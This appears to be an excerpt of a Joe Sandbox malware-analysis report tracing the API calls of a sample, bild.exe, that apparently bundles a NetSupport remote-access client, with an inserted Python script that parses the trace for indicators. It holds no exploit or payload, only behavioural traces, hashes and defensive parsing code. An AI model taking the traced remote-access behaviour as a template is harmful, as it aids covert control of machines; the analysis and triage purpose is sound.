                                                                                        • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                        • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                        • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                      • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                      • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                      • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                      • API String ID: 1108920153-1959555903
                                                                                      • Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                      • Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
                                                                                      • Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                      • Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 11031926
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                      • String ID: %s%s.bin$405464$clientinv.cpp$m_pDoInv == NULL
                                                                                      • API String ID: 4180936305-1502302367
                                                                                      • Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                      • Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
                                                                                      • Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                      • Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
                                                                                      • __strdup.LIBCMT ref: 111446A7
                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                        • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
                                                                                      • _free.LIBCMT ref: 111446DC
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      • CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                      • String ID:
                                                                                      • API String ID: 398584587-0
                                                                                      • Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                      • Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
                                                                                      • Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                      • Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1
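The API bullets in these function blocks all follow one fixed shape, which makes them easy to mine for indicators during triage. What follows is an added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python parser for the "• <api>.<module>(args), ref: <addr>" lines, including the optional "Part of subcall function <addr>:" prefix, run over lines copied from the blocks above. It pulls out the persistence path passed to GetModuleFileNameA, the registry key opened under HKEY_LOCAL_MACHINE, the DLL loaded at run time and the export resolved from it. The sample input is constructed from these blocks; the HKEY_* handle values are the documented Windows constants; the indicator categories are this example's own choice, not a Joe Sandbox feature.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: API bullet lines copied from the function
# blocks above (bild.exe, process 4, image base 0x11000000). The bullet
# glyph and the "Part of subcall function" prefix are Joe Sandbox's own
# rendering; nothing here is fabricated beyond selecting these lines.
SAMPLE_REPORT = r"""
• Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Public\Videos\Video\bild.exe,00000104,?,11143E73,?), ref: 11143C49
• WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
• Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
• LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
• GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
• Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
• wsprintfA.USER32 ref: 11146E06
• _malloc.LIBCMT ref: 1110F439
• CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
"""

# One API bullet: optional "Part of subcall function <addr>:" prefix,
# "<api>.<module>", an optional "(args)" list, and the "ref: <addr>" call site.
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_:]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Predefined HKEY_* handle values, as printed in the first RegOpenKeyEx argument.
HIVES = {
    "80000000": "HKEY_CLASSES_ROOT",
    "80000001": "HKEY_CURRENT_USER",
    "80000002": "HKEY_LOCAL_MACHINE",
    "80000003": "HKEY_USERS",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str                 # address of the call instruction
    caller: Optional[str]    # sub-function address when the call is nested, else None


def parse_api_lines(text: str) -> list:
    """Parse every API bullet in a function block; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m["args"]
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m["api"], m["module"], args, m["ref"], m["caller"]))
    return calls


def _is_literal(arg: str) -> bool:
    """True for arguments the sandbox resolved to a string rather than a raw 32-bit value or '?'."""
    return arg != "?" and re.fullmatch(r"[0-9A-F]{8}", arg) is None


def _add(bucket: list, value: str) -> None:
    if value not in bucket:
        bucket.append(value)


def extract_indicators(calls: list) -> dict:
    """Collect triage-relevant values: file paths, registry keys, DLLs loaded
    at run time, exports resolved with GetProcAddress, and every literal string argument."""
    ind = {"paths": [], "registry_keys": [], "dll_loads": [],
           "resolved_exports": [], "strings": []}
    for c in calls:
        if c.api.startswith("RegOpenKeyEx") and len(c.args) >= 2:
            _add(ind["registry_keys"], HIVES.get(c.args[0], c.args[0]) + "\\" + c.args[1])
        if c.api.startswith("LoadLibrary") and c.args:
            _add(ind["dll_loads"], c.args[0])
        if c.api == "GetProcAddress" and len(c.args) >= 2:
            _add(ind["resolved_exports"], c.args[1])
        for a in c.args:
            if re.match(r"^[A-Za-z]:\\", a):
                _add(ind["paths"], a)
            if _is_literal(a):
                _add(ind["strings"], a)
    return ind


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_REPORT)
    for c in calls:
        nest = f"  (via {c.caller})" if c.caller else ""
        print(f"{c.ref}: {c.module}!{c.api}({', '.join(c.args)}){nest}")
    for key, values in extract_indicators(calls).items():
        print(f"{key}: {values}")
```

Running the script over a full report export (one block per function, as listed here) gives a deduplicated list of paths, registry keys and dynamically resolved imports without reading every block by hand; arguments the sandbox could not resolve ("?") and raw 32-bit values are deliberately left out of the string list.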
                                                                                      APIs
                                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
                                                                                        • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
                                                                                      • _free.LIBCMT ref: 1100EDB4
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      • _free.LIBCMT ref: 1100EDC7
                                                                                      • _free.LIBCMT ref: 1100EDDA
                                                                                      • _free.LIBCMT ref: 1100EDED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                       • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                      • String ID:
                                                                                      • API String ID: 3515823920-0
                                                                                      • Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                      • Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
                                                                                      • Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                      • Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91
                                                                                      APIs
                                                                                        • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                        • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                        • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                      • wsprintfA.USER32 ref: 1114593E
                                                                                      • wsprintfA.USER32 ref: 11145954
                                                                                        • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                        • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                        • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                       • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                      • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                      • API String ID: 3779116287-2600120591
                                                                                      • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                      • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                      • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                      • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                      • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                       • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile$CloseHandle
                                                                                      • String ID: "
                                                                                      • API String ID: 1443461169-123907689
                                                                                      • Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                      • Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
                                                                                      • Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                      • Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,4012B9B4,74DF2EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                       • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                      • String ID: Client$DisableGeolocation
                                                                                      • API String ID: 3315423714-4166767992
                                                                                      • Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                      • Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
                                                                                      • Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                      • Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
                                                                                      APIs
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
                                                                                        • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                        • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                        • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                        • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                      • TranslateMessage.USER32(?), ref: 110271F0
                                                                                      • DispatchMessageA.USER32(?), ref: 110271F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                       • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                      • String ID: Exit Msgloop, quit=%d
                                                                                      • API String ID: 3212272093-2210386016
                                                                                      • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                      • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                      • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                      • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 110173FD
                                                                                        • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101733C
                                                                                        • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
                                                                                        • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                        • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
                                                                                        • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017252
                                                                                        • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                        • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                        • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
                                                                                      • SetEvent.KERNEL32(0000031C), ref: 1101741D
